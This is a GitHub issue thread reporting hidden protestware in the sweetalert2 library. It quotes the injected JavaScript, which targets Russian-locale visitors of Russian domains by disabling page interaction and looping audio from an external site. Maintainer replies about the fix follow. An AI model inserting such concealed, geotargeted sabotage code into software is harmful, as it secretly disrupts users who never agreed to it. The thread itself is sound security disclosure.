TheSpaghettiDetective/obico-server #994: hidden functionality in sweetalert2 v9.17.4

pterodaktil02, 2024-07-21:
sweetalert2 versions 9.17.4 and upare vulnerable to hidden functionality that was introduced by the maintainer. The package outputs audio and/or video messages that do not pertain to the functionality of the package and is not included in versions 9.0.0 - 9.17.3.

Workaround
Use a version 9.0.0 - 9.17.3 of the package until the maintainer releases a fix.

```
  // Dear russian users visiting russian sites. Let's have fun.
  if (typeof window !== 'undefined' && /^ru\b/.test(navigator.language) && location.host.match(/\.(ru|su|by|xn--p1ai)$/)) {
    var now = new Date();
    var initiationDate = localStorage.getItem('swal-initiation');
    if (!initiationDate) {
      localStorage.setItem('swal-initiation', "".concat(now));
    } else if ((now.getTime() - Date.parse(initiationDate)) / (1000 * 60 * 60 * 24) > 3) {
      setTimeout(function () {
        document.body.style.pointerEvents = 'none';
        var ukrainianAnthem = document.createElement('audio');
        ukrainianAnthem.src = 'https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3';
        ukrainianAnthem.loop = true;
        document.body.appendChild(ukrainianAnthem);
        setTimeout(function () {
          ukrainianAnthem.play()["catch"](function () {
            // ignore
          });
        }, 2500);
      }, 500);
    }
  }
```

kennethjiang, 2024-07-21:
Thank you @pterodaktil02 for reporting this issue

closed 2024-07-21 by kennethjiang

pterodaktil02, 2024-07-22:
Thanks   for quick  fix   but  i see same problem  in   backend   too [backend](https://github.com/TheSpaghettiDetective/obico-server/tree/fa5c450717c58841775825395ff3f7d47c254585/backend)

kennethjiang, 2024-07-25:
> Thanks for quick fix but i see same problem in backend too ( /backend/static_build/frontend/js/chunk-vendors.js)

I believe /backend/static_build/ contains only the bundled files built form the frontend during the release process. Now that it's fixed in the frontend, it'll be fixed in the /backend/static_build/frontend/ when we make the next release

commit fa5c4507 (2024-07-21): closes #994